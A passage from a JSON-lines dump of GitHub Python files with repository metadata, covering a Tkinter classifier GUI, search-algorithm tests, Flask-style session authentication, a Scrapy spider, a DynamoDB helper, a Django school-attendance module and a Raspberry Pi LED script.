rely=0.6, height=34, width=247)\r\n self.Classify_Button.configure(text=\"Classify\",command=self.controller.classify)\r\n\r\n self.Path_Label = Label(self.main,background=\"#ffffff\",foreground=\"#000000\",text=\"Directory path\")\r\n self.Path_Label.place(relx=0.03, rely=0.24, height=31, width=104)\r\n \r\n\r\n self.Bins_Label = Label(self.main,background=\"#ffffff\",foreground=\"#000000\",text=\"Discretiztion Bins\")\r\n self.Bins_Label.place(relx=0.03, rely=0.33, height=21, width=96)\r\n \r\n self.Bins_Entry = Entry(self.main,background=\"white\",font=\"TkFixedFont\",insertbackground=\"black\",readonlybackground=\"white\",state='readonly')\r\n self.Bins_Entry.place(relx=0.26, rely=0.32,height=30, relwidth=0.14,width=154)\r\n \r\n self.InfoLabel = Label(self.main,background=\"white\",text=\"\")\r\n self.InfoLabel.place(relx=0.26, rely=0.90, height=21, width=400)\r\n self.InfoLabel2 =Label(self.main,background=\"white\",text=\"\")\r\n self.InfoLabel2.place(relx=0.26, rely=0.95, height=21, width=400)\r\n \r\n def __findpath(self):\r\n \"\"\"function to ask the path from the user\"\"\"\r\n self.path=tkFileDialog.askdirectory(parent=self.main,title='Please select a directory')\r\n #if the user heats the cancule batuoon the we will exit the program\r\n if not self.path:\r\n tkMessageBox.showinfo('','Exiting...')\r\n self.main.destroy()\r\n self.Browse_Entry.configure(state='normal')\r\n self.Browse_Entry.delete(0, END)\r\n self.Browse_Entry.insert(0, self.path)\r\n self.Browse_Entry.configure(state='readonly')\r\n #sending the path to check in the controller (to find out if the path contains all the files we need)\r\n self.controller.check_path(self.path)\r\n \r\n \r\n def update(self,msg):\r\n \"\"\"function to show a messagebox with the desiered massage that comes from the controller\"\"\"\r\n tkMessageBox.showinfo(\"\",msg)\r\n\r\n def show_updates(self,prevmsg,msg):\r\n \"\"\"function to show updates on the frame\"\"\"\r\n self.InfoLabel.configure(text=prevmsg)\r\n self.InfoLabel2.configure(text=msg)\r\n \r\n \r\n \r\n \r\n def file_error_handling(self,titlemsg,msg):\r\n tkMessageBox.showerror(titlemsg,msg)\r\n ans=tkMessageBox.askyesno(message='Do you want to try again?')\r\n if not ans:\r\n tkMessageBox.showinfo('','Exiting...')\r\n self.main.destroy()\r\n self.__findpath()\r\n\r\n \r\n\r\n\r\n \r\n","repo_name":"LiorReznik/NaiveBayesClassifier","sub_path":"View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22674249600","text":"import cv2\n\nprint(\"Amogus\")\n\nimageName = cv2.imread(\"images\\\\meeeee.jpg\", 1)\n\nimageResize = cv2.resize(imageName,(200,350))\ncv2.imshow(\"Me have become resize\", imageResize)\ncv2.imshow(\"Hrello dis me\", imageName)\ncv2.waitKey(0)\n\n\n\n\n\n\n","repo_name":"mafl20/p3","sub_path":"Scripts/martinTestTingTing.py","file_name":"martinTestTingTing.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12503526285","text":"import random, time\nfrom typing import Callable\n\ndef test_search_func(size_of_sample_set: int, search_func: Callable):\n x, y = -size_of_sample_set, size_of_sample_set\n sample_list = random.sample(range(x, y), size_of_sample_set)\n sample_list.sort()\n search_elem = random.choice(sample_list)\n \n start_time = time.time()\n i = search_func(*(search_elem, sample_list))\n print(\"took %s\" % (time.time() - start_time))\n\n assert search_elem == sample_list[i]\n\n print(f\"Found {sample_list[i]} on index {i} in list: {sample_list[:10]}.. (searched for: {search_elem})\")\n\ndef test_search_func_not_found(search_func: Callable):\n sample_list = random.sample(range(0, 100), 15)\n sample_list.sort()\n search_elem = 120\n\n start_time = time.time()\n assert search_func(*(search_elem, sample_list)) == -1\n print(\"took %s\" % (time.time() - start_time))\n print(f\"Did not found {search_elem} in list: {sample_list[:10]}..\")\n\ndef test_min_max_search(size_of_sample_set: int, min_max_search_func: Callable):\n x, y = -size_of_sample_set, size_of_sample_set\n sample_list = random.sample(range(x, y), size_of_sample_set)\n expected_min, expected_max = min(sample_list), max(sample_list)\n\n start_time = time.time()\n actual_min, actual_max = min_max_search_func(sample_list)\n print(\"took %s\" % (time.time() - start_time))\n\n assert (expected_min, expected_max) == (actual_min, actual_max)\n\n print(f\"Found min/max {actual_min}/{actual_max} in {sample_list[:10]}...\")","repo_name":"PXZ1337/search-algorithms","sub_path":"src/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43818846460","text":"#!/usr/bin/env python3\n\"\"\"\nModule session_auth\n\"\"\"\nfrom api.v1.auth.auth import Auth\nimport uuid\nfrom models.user import User\n\n\nclass SessionAuth(Auth):\n \"\"\"Class for session authentication\"\"\"\n user_id_by_session_id = {}\n\n def create_session(self, user_id: str = None) -> str:\n \"\"\"creates a Session ID for a user_id\"\"\"\n if user_id is None or isinstance(user_id, str) is False:\n return None\n session_id = str(uuid.uuid4())\n self.user_id_by_session_id[session_id] = user_id\n\n return session_id\n\n def user_id_for_session_id(self, session_id: str = None) -> str:\n \"\"\"returns a User ID based on a Session ID\"\"\"\n if session_id is None or isinstance(session_id, str) is False:\n return None\n return self.user_id_by_session_id.get(session_id)\n\n def current_user(self, request=None):\n \"\"\"returns a User instance based on a cookie value\n cookie value is the session id\"\"\"\n cookie_value = self.session_cookie(request)\n user_id = self.user_id_for_session_id(cookie_value)\n return User.get(user_id)\n\n def destroy_session(self, request=None):\n \"\"\"deletes the user session / logout\"\"\"\n if request is None:\n return False\n cookie_value = self.session_cookie(request)\n if cookie_value is None or self.user_id_for_session_id(\n cookie_value) is None:\n return False\n del self.user_id_by_session_id[cookie_value]\n return True\n","repo_name":"Robid-Phantom007/alx-backend-user-data","sub_path":"0x02-Session_authentication/api/v1/auth/session_auth.py","file_name":"session_auth.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6053947317","text":"from .base_item import BaseItem\n\n\nclass Paragraph(BaseItem):\n def __init__(self, text, x1, y1, x2, y2, lang, text_lines=None):\n super().__init__(text, x1, y1, x2, y2)\n self.text = ' '.join(text)\n self.lang = lang\n self.text_lines = text_lines\n\n def compute_coordinates(self, x1, y1, x2, y2):\n x1 = min(x1)\n y1 = min(y1)\n\n x2 = max(x2)\n y2 = max(y2)\n return x1, y1, x2, y2","repo_name":"robertgargalac/tuatara","sub_path":"ocr/app/items/paragraph.py","file_name":"paragraph.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19759976138","text":"#!/usr/bin/python3\n\nimport collections\nimport re\nimport secrets\n\n\nclass Node(collections.UserDict):\n\n def __init__(self):\n self.data = dict()\n self.key = secrets.token_bytes(8)\n\n def __hash__(self):\n return hash(self.key)\n\n\ndef dfs_visit(node, visited=set()):\n visited.add(node)\n for n in node:\n if n not in visited:\n dfs_visit(n, visited)\n return visited\n\n\ndef dfs_count(node, visited=dict()):\n if node in visited:\n return visited[node]\n if len(node) == 0:\n visited[node] = 1\n return 1\n counts = sum(d * dfs_count(n, visited) for n, d in node.items()) + 1\n visited[node] = counts\n return counts\n\n\ndef main():\n with open(\"input/07.txt\") as f:\n lines = [l.strip().split(' contain ') for l in f.readlines()]\n graph1 = collections.defaultdict(Node)\n graph2 = collections.defaultdict(Node)\n for outer, inners in lines:\n outer = outer[:-5]\n inners = re.findall(r'(\\d+) (\\b.*?\\b \\b.*?\\b) bags?[,.]', inners)\n for n, c in inners:\n graph1[c][graph1[outer]] = int(n)\n graph2[outer][graph2[c]] = int(n)\n print(len(dfs_visit(graph1['shiny gold'])) - 1)\n print(dfs_count(graph2['shiny gold']) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vulpicastor/advent-of-code-2020","sub_path":"src/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39696951487","text":"import scrapy\nimport json\nimport os\nfrom scrapy.spiders import Spider\nfrom scrapy.http import FormRequest\nfrom scrapy.http import Request\nfrom chainxy.items import ChainItem\nfrom lxml import etree\nfrom selenium import webdriver\nfrom lxml import html\n\nclass bostonpizza(scrapy.Spider):\n\tname = 'bostonpizza'\n\tdomain = 'https://www.bostonpizza.com/'\n\thistory = ['']\n\n\tdef __init__(self):\n\t\tscript_dir = os.path.dirname(__file__)\n\t\tfile_path = script_dir + '/geo/cities.json'\n\t\twith open(file_path) as data_file: \n\t\t\tlocation_list = json.load(data_file)\n\n\tdef start_requests(self):\n\t\tinit_url = 'https://bostonpizza.com/json/stores-en.json'\n\t\tyield scrapy.Request(url=init_url, callback=self.body) \n\n\tdef body(self, response):\n\t\tprint(\"========= Checking.......\")\n\t\t\n\t\tstore_list = json.loads(response.body)\n\t\tfor store in store_list:\n\t\t\titem = ChainItem()\n\t\t\titem['store_name'] = store['name']\n\t\t\titem['store_number'] = store['id']\n\t\t\titem['address'] = store['address']['address']\n\t\t\titem['address2'] = ''\n\t\t\titem['city'] = store['address']['city']\n\t\t\titem['state'] = store['address']['province']\n\t\t\titem['zip_code'] = store['address']['postal_code']\n\t\t\titem['country'] = store['address']['country']\n\t\t\titem['phone_number'] = store['contact']['store']\n\t\t\titem['latitude'] = store['coordinates']['latitude']\n\t\t\titem['longitude'] = store['coordinates']['longitude']\n\t\t\th_temp = ''\n\t\t\thour_list = store['hours']\n\t\t\tfor hour in hour_list:\n\t\t\t\th_temp += hour + ', '\n\t\t\titem['store_hours'] = h_temp[:-2]\n\t\t\titem['store_type'] = ''\n\t\t\titem['other_fields'] = ''\n\t\t\titem['coming_soon'] = ''\n\t\t\tyield item\t\t\n\n\tdef validate(self, item):\n\t\ttry:\n\t\t\treturn item.strip()\n\t\texcept:\n\t\t\treturn ''","repo_name":"coralisland-git/Alscrapy-store-locations","sub_path":"91800(BS2)/28-bostonpizza/chainxy/spiders/bostonpizza.py","file_name":"bostonpizza.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"16352776413","text":"class Solution:\n def print_n_num(self, n):\n if n < 1:\n return\n\n max_n_num = 1\n for i in range(n):\n max_n_num *= 10\n\n for num in range(1, max_n_num):\n print(num)\n\nif __name__ == '__main__':\n S = Solution()\n S.print_n_num(2)\n\n\n\n\n","repo_name":"MemoryForSky/Data-Structures-and-Algorithms","sub_path":"my_target_offer/17_print_1_to_max_n_num.py","file_name":"17_print_1_to_max_n_num.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27674171432","text":"def solution(name):\n alphabet=list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n arr = []\n\n for j in name:\n for index, i in enumerate(alphabet):\n if i == j:\n print(j, i)\n arr.append(index)\n cur = 0\n count = 0\n while arr:\n char = arr[0]\n \n print('----------------', '[0]',arr[0],'cur',cur)\n #오른쪽\n if abs(char - cur) > abs(len(alphabet) - char):\n count += abs(len(alphabet) - char)\n print('>', 'plus', abs(len(alphabet) - char), 'count', count)\n #왼쪽\n elif abs(char - cur) > char + 1:\n count += char + 1\n print('<', 'plus', char + 1, 'count', count)\n else:\n count += abs(char - cur) \n print('^', 'plus', abs(char - cur), 'count', count)\n\n cur = arr[0]\n arr.pop(0)\n print(' ')\n return count\n\nprint(solution('SAAAAAARRM'))","repo_name":"Lee-ji-soo/algorithm","sub_path":"그리디/조이스틱1.py","file_name":"조이스틱1.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20299060303","text":"\nimport requests\nfrom bs4 import BeautifulSoup\nYOUTUBE_TRENDING_URL = 'https://www.youtube.com/feed/trending'\n\n# não executa JS\nresponse = requests.get(YOUTUBE_TRENDING_URL)\n\nprint('status code', response.status_code)\n\ndoc = BeautifulSoup(response.text,'html.parser')\nprint(doc.title.Text)\n\n#find all video divs\nvideo_divs = doc.find_all('div', class_='style-scope ytd-video-renderer')\nprint(f'found {len(video_divs)} videos')","repo_name":"FernandesDavi/selenium-web-scraper","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7848860672","text":"\nimport os\nimport boto3\n\nAWS_ACCESS_KEY_ID = os.environ[\"AWS_ACCESS_KEY_ID\"]\nAWS_SECRET_ACCESS_KEY = os.environ[\"AWS_SECRET_ACCESS_KEY\"]\nREGION_NAME='us-west-1'\n\nREAD_CAPACITY_DEFAULT = 5\nWRITE_CAPACITY_DEFAULT = 5\n\nclass database:\n\n @staticmethod\n def admin_session():\n session = boto3.Session(\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n )\n\n return session\n\n @staticmethod\n def dynambo_admin_session():\n session = database.admin_session()\n dynamodb = session.resource('dynamodb', region_name=REGION_NAME)\n\n return dynamodb\n \n @staticmethod\n def dynambo_admin_client():\n session = database.admin_session()\n dynamodb = boto3.client('dynamodb', region_name=REGION_NAME)\n\n return dynamodb\n\n @staticmethod\n def create_table(tablename, key_var, range_var, attributes):\n\n dynamodb = database.dynambo_admin_session()\n\n if range_var is not None:\n keySchema = [\n {\n 'AttributeName': key_var,\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': range_var,\n 'KeyType': 'RANGE'\n },\n ]\n else:\n keySchema = [{'AttributeName': key_var, 'KeyType': 'HASH'}]\n\n attributeDefinitions = []\n for key, value in attributes.items():\n attribute = {}\n attribute[\"AttributeName\"] = key\n attribute[\"AttributeType\"] = value\n attributeDefinitions.append(attribute)\n \n print(keySchema, attributeDefinitions)\n \n provisionedThroughput={\n 'ReadCapacityUnits': READ_CAPACITY_DEFAULT,\n 'WriteCapacityUnits': WRITE_CAPACITY_DEFAULT,\n }\n\n table = dynamodb.create_table(\n TableName=tablename,\n KeySchema=keySchema,\n AttributeDefinitions=attributeDefinitions,\n ProvisionedThroughput=provisionedThroughput\n )\n\n print(table)\n\n table.meta.client.get_waiter('table_exists').wait(TableName=tablename)\n\n @staticmethod\n def clear_table(tablename, key_var, range_var):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n result = table.scan()\n\n\t # result = json.loads(result[\"Items\"])\n with table.batch_writer() as batch:\n for obj in result[\"Items\"]:\n batch.delete_item(Key={\n key_var: obj[\"product_name\"],\n range_var: obj[\"brand_name\"]\n })\n\n print(tablename, \"cleared\")\n \n @staticmethod\n def add_table_entry(tablename, item):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n table.put_item(Item=item)\n\n @staticmethod\n def add_table_batch(tablename, items):\n dynamodb = database.dynambo_admin_session()\n table = dynamodb.Table(tablename)\n with table.batch_writer() as batch:\n for item in items:\n batch.put_item(Item=item)\n\n# add config to environment variables\n\n ","repo_name":"af13s/curlbot","sub_path":"database/database_accessor.py","file_name":"database_accessor.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39936103244","text":"from django.core.urlresolvers import resolve\nfrom django.utils import six\nfrom django.utils.six.moves.urllib.parse import urlparse\n\n\ndef add_categories_to_threads(root_category, categories, threads):\n categories_dict = {}\n for category in categories:\n categories_dict[category.pk] = category\n\n top_categories_map = {}\n\n for thread in threads:\n thread.top_category = None\n thread.category = categories_dict[thread.category_id]\n\n if thread.category == root_category:\n continue\n elif thread.category.parent_id == root_category.pk:\n thread.top_category = thread.category\n elif thread.category_id in top_categories_map:\n thread.top_category = top_categories_map[thread.category_id]\n elif root_category.has_child(thread.category):\n # thread in subcategory resolution\n for category in categories:\n if (category.parent_id == root_category.pk and\n category.has_child(thread.category)):\n top_categories_map[thread.category_id] = category\n thread.top_category = category\n else:\n # global thread in other category resolution\n for category in categories:\n if category.level == 1 and (\n category == thread.category or\n category.has_child(thread.category)):\n top_categories_map[thread.category_id] = category\n thread.top_category = category\n\n\nSUPPORTED_THREAD_ROUTES = {\n 'misago:thread': 'pk',\n 'misago:thread-post': 'pk',\n 'misago:thread-last': 'pk',\n 'misago:thread-new': 'pk',\n 'misago:thread-unapproved': 'pk',\n}\n\n\ndef get_thread_id_from_url(request, url):\n try:\n clean_url = six.text_type(url).strip()\n bits = urlparse(clean_url)\n except:\n return None\n\n if bits.netloc and bits.netloc != request.get_host():\n return None\n\n if bits.path.startswith(request.get_host()):\n clean_path = bits.path.lstrip(request.get_host())\n else:\n clean_path = bits.path\n\n try:\n wsgi_alias = request.path[:len(request.path_info) * -1]\n resolution = resolve(clean_path[len(wsgi_alias):])\n except:\n return None\n\n if not resolution.namespaces:\n return None\n\n url_name = '{}:{}'.format(':'.join(resolution.namespaces), resolution.url_name)\n kwargname = SUPPORTED_THREAD_ROUTES.get(url_name)\n\n if not kwargname:\n return None\n\n try:\n return int(resolution.kwargs.get(kwargname))\n except (TypeError, ValueError):\n return None\n","repo_name":"sonnyESP24/EFCGSM","sub_path":"backend/misago/threads/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26010460231","text":"from digit_reg import train_main, infer_main\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom logger import logger\nimport sys\nimport traceback\nfrom urllib import parse\n\nclass DigitRegHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n url = parse.urlparse(self.path)\n param_dict = parse.parse_qs(url.query)\n inputdir = param_dict.get('inputdir',[''])[0]\n outputdir = param_dict.get('outputdir',[''])[0]\n mode = param_dict.get('mode',[''])[0]\n if len(inputdir) <= 0 or len(outputdir) <= 0 or len(mode) <= 0:\n self.response(\"valid params\")\n return\n try:\n if mode == \"price\":\n infer_main(inputdir, \"model\", outputdir, mode)\n self.response(\"\")\n elif mode == \"barcode\":\n infer_main(inputdir, \"model\", outputdir, mode)\n self.response(\"\")\n else:\n self.response(\"UNKNOWN MODE: {}\".format(mode))\n except:\n error = traceback.format_exc()\n self.response(error)\n\n def response(self, content):\n if len(content) <= 0:\n self.send_response(200)\n content = \"success\"\n else:\n self.send_response(500)\n self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\n self.send_header(\"Content-Length\", str(len(content)))\n self.end_headers()\n self.wfile.write(content.encode('utf-8'))\n\nif __name__ == '__main__':\n from http.server import HTTPServer\n server = HTTPServer(('localhost', 8081), DigitRegHandler)\n print('Starting server, use to stop')\n try:\n server.serve_forever()\n except:\n sys.exit(-1)\n","repo_name":"xinshoulzc/ticket_reg","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33882365753","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required, user_passes_test,permission_required\nfrom rest_framework.response import Response\nfrom django.core.files.storage import FileSystemStorage\nfrom resources.forms import adminForm, resourceForm\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom resources.models import admin, resource\nfrom rest_framework.views import APIView\nfrom django.utils import timezone\nfrom resources.serializer import adminSerializer\nimport json\nimport re\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom resources.models import admin, resource, content_type\nfrom state import models as state_models\nfrom country import models as country_models\nfrom city import models as city_models\nfrom board.models import Board as board_models\nfrom medium.models import Medium as medium_models\nfrom school import models as school_models\nfrom class_master import models as class_models\nfrom division.models import Division as division_models\nfrom teacher.models import Teacher as teacher\nfrom users.models import UserProfile,User\nfrom subject.models import Subject\nfrom bank import models as bank_models\nfrom users import models as user_models\nfrom rest_framework import status\nfrom operator import itemgetter\nfrom django.template.defaulttags import register\nfrom division import models as division\nfrom student import models as student\nfrom attendance.models import Attendance as attendance\nfrom django.db.models.functions import Trunc\nfrom datetime import datetime \n\n# Create your views here.\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@csrf_exempt\ndef get_division_old(school_id):\n division_data = []\n division_list = division_models.objects.filter(school_id=school_id).values_list('id', 'division_name')\n for i in division_list:\n case2 = {'id': i[0], 'name': i[1].capitalize()}\n division_data.append(case2)\n division_data = sorted(division_data, key=itemgetter('name'))\n return division_data\n\n@csrf_exempt\ndef get_division(school_id,division_id):\n division_data = []\n print(division_id)\n division_list = division.school_division_mapping.objects.filter(division_id=division_id).values_list('division_id__id','division_id__division_name','class_id__id')\n for i in division_list:\n case2 = {'id': i[0], 'name': i[1].capitalize(),'class_id':i[2]}\n division_data.append(case2)\n division_data = sorted(division_data, key=itemgetter('name'))\n return division_data\n\n@csrf_exempt\ndef get_class(school_id,class_id):\n class_data = []\n class_list = class_models.class_master.objects.filter(pk=class_id).values_list('id', 'class_name')\n print(class_list)\n for i in class_list:\n case2 = {'id': i[0], 'name': i[1]}\n class_data.append(case2)\n return class_data\n\n@login_required\n@permission_required('attendance.add_attendance', raise_exception=True)\ndef mark_attn(request):\n if request.method == 'GET': \n student_list=[]\n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n pr = teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n print(class_division)\n print(class_division[0].school_division.id)\n list_of_studentid = division.student_class_mapping.objects.filter(school_division=class_division[0].school_division.id)\n print(list_of_studentid[0].id)\n list_of_students= student.Student.objects.filter(pk__in=list_of_studentid).values_list('id','first_name','last_name')\n print(list_of_students)\n for i in list_of_students:\n case2 = {'id': i[0], 'name': str(i[1]+\" \"+i[2])}\n student_list.append(case2)\n return render(request, 'markattd.html', {'list':student_list})\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Bad Request'})\n return response\n\n@login_required\ndef save_attendance(request):\n if request.method=='POST':\n all_students=[]\n student_list=request.POST.getlist('students')\n date = request.POST.get('attd_date') \n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n pr = teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n list_of_studentid = division.student_class_mapping.objects.filter(school_division=class_division[0].school_division.id)\n\n list_of_students= student.Student.objects.filter(pk__in=list_of_studentid).values_list('id')\n print(list_of_students)\n for i in list_of_students:\n all_students.append(i[0])\n school_division=division.school_division_mapping.objects.filter(pk=class_division[0].school_division.id)\n for i in all_students:\n student_id=student.Student.objects.filter(pk=i)\n if (str(i) in student_list):\n new_attd=attendance.objects.create(date=date,student_id=student_id[0],school_division=school_division[0],teacher_id=pr[0],is_present=1)\n else:\n new_attd=attendance.objects.create(date=date,student_id=student_id[0],school_division=school_division[0],teacher_id=pr[0],is_present=0)\n response=JsonResponse({'status': 'success', 'msg': 'Attendance added sucessfully'})\n return response\n\n@login_required\n# @permission_required('attendance.view_attendance', raise_exception=True)\ndef list_attendance(request):\n user=user_models.User.objects.get(username=request.user.username)\n request_user_profile=User.objects.filter(username=str(request.user))\n\n if user.has_perm('attendance.view_attendance'):\n data = []\n group_list=[]\n ob = admin()\n resource_list = {}\n count = 1\n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n user_group = request.user.groups.values_list('name', flat=True)\n if 'role' in request.session:\n roles_used = request.session['role']\n print(user_group)\n for i in user_group:\n print(i)\n j=i.split('-',2)\n print(j[0])\n group_list.append(j[0])\n print(request_user_profile[0].username)\n if (roles_used==\"Parent\"):\n pr=request_user_profile\n class_id=student.Student.objects.filter(parent=pr[0].id).values_list('class_name','division','id')\n class_details=class_id[0][0]\n division_details=class_id[0][1]\n student_id=class_id[0][2]\n else:\n pr = teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n print(class_division)\n print(class_division[0].school_division.id)\n division_id=division.school_division_mapping.objects.filter(pk=class_division[0].school_division.id)\n division_details=division_id[0].division_id.id\n class_details=division_id[0].class_id.id\n school_id=UserProfile.objects.filter(user=request_user_profile[0].id).values_list('school_id')\n print(school_id)\n class_list = get_class(school_id[0][0],class_details)\n division_list = get_division(school_id[0][0],division_details) \n if request.method == 'GET':\n print(\"call122222\")\n context = {'data':data,'class_list':class_list,'division_list':division_list}\n template = 'attendance_list.html'\n return render(request, template, context)\n\n else:\n date_list=[]\n student_names=[]\n class_lists=request.POST.get('class_list')\n division_lists=request.POST.get('division_list')\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n # roles_used = request.POST.get('roles')\n\n print(roles_used)\n print(class_lists)\n print(division_lists)\n print(start_date)\n print(end_date)\n class_id=class_models.class_master.objects.filter(pk=class_lists)\n print(class_id)\n division_id=division.Division.objects.filter(pk=division_lists)\n print(division_id)\n print(class_id[0])\n print(division_id[0])\n print(school_id[0])\n # print(school_id[0][0])\n school_division=division.school_division_mapping.objects.filter(class_id=class_id[0],division_id=division_id[0],school_id=school_id[0][0])\n \n if ((roles_used==\"Parent\") and (school_division)):\n \n student_group= attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0],student_id=student_id).values_list('student_id').distinct()\n elif school_division:\n student_group= attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0]).values_list('student_id').distinct()\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Class division combination doesnt exist'})\n return response\n dates_list=[\"Sr No\",\"Roll Number\",\"Student Name\"]\n if student_group:\n for students in student_group:\n students_list=attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0]).filter(student_id=students[0]).order_by('date')\n\n serialised_data=[]\n student_details=student.Student.objects.filter(pk=students[0])\n student_name=student_details[0].first_name+\" \"+student_details[0].last_name\n serialised_data.append(count)\n serialised_data.append(student_details[0].roll_number)\n student_names=student_name\n serialised_data.append(student_names)\n attendance_status=[]\n for i in students_list:\n present_status=('Present' if i.is_present else 'Absent')\n date_list.append(str(i.date))\n attendance_status.append(present_status)\n count = count + 1\n serialised_data.extend(attendance_status)\n data.append(serialised_data)\n dates_list.extend(date_list[-(len(attendance_status)):])\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Attendance for the selected period doesnot exist'})\n return response\n context = {'data': data,'student_list':student_names,'date_list':dates_list,'class_list':class_list,'division_list':division_list,'attdate':start_date,'enddate':end_date,'class_lists':class_lists,'division':division_id[0].division_name}\n template = 'attendance_list.html'\n return render(request, template, context)\n\n else:\n return render(request,'forbidden_page.html')\n\n\n\n","repo_name":"pheonixfrmash/school_app","sub_path":"attendance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40755740958","text":"#!/usr/bin/env python\n##### This program makes two LEDS blink. Pressing the switch changes the delay.\n##### This program has been organized a bit more and exits properly\nimport RPi.GPIO as GPIO\nimport time\n\n# pins for LEDs\nL1 = 25\nL2 = 20\nSW1 = 6\ndelay = 0.8\n\n\n#set up GPIO\ndef setup():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(L1, GPIO.OUT)\n GPIO.setup(L2, GPIO.OUT)\n GPIO.setup(SW1, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n#turn on LED\ndef flash():\n GPIO.output(L1, GPIO.HIGH)\n GPIO.output(L2, GPIO.HIGH)\n while True:\n if (GPIO.input(SW1) == 0): #switch is pressed\n delay = 0.1\n else:\n delay = 0.8\n GPIO.output(L1,GPIO.HIGH)\n GPIO.output(L2,GPIO.LOW)\n time.sleep (delay)\n GPIO.output(L1,GPIO.LOW)\n GPIO.output(L2,GPIO.HIGH)\n time.sleep (delay)\n\ndef main():\n setup()\n flash()\n\ntry: # try-catch is needed to gracefully handle CTRL-C\n main()\nexcept KeyboardInterrupt:\n GPIO.cleanup() # clean up GPIO on CTRL+C exit\n","repo_name":"salamander2/leds","sub_path":"light5.py","file_name":"light5.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"75048714888","text":"#!/usr/bin/python\nfrom lettuce import *\nimport config\nimport os\n\ndef db_path(database):\n db_path = os.path.join(os.getcwd(), 'features', 'terrain', 'TestData', 'databases', database)\n return db_path\n\ndatabases = {\"corrupt\": db_path(\"corrupt_db\"),\n \"empty\": db_path(\"empty_db\"),\n \"351\": db_path(\"351sqlitedb\"),\n \"bz17556\": db_path(\"bz17556_backup_80\")\n }\n\n@step('I have (a|an|the) \"(.*?)\" miro db')\ndef reset_database(self, db):\n if db == \"fresh\": \n world.config.set_def_db_and_prefs()\n else:\n world.config.replace_database(databases[db])\n\n","repo_name":"jdragojevic/mirosalad","sub_path":"tests.sikuli/features/terrain/steps/setup_steps.py","file_name":"setup_steps.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8524965275","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, 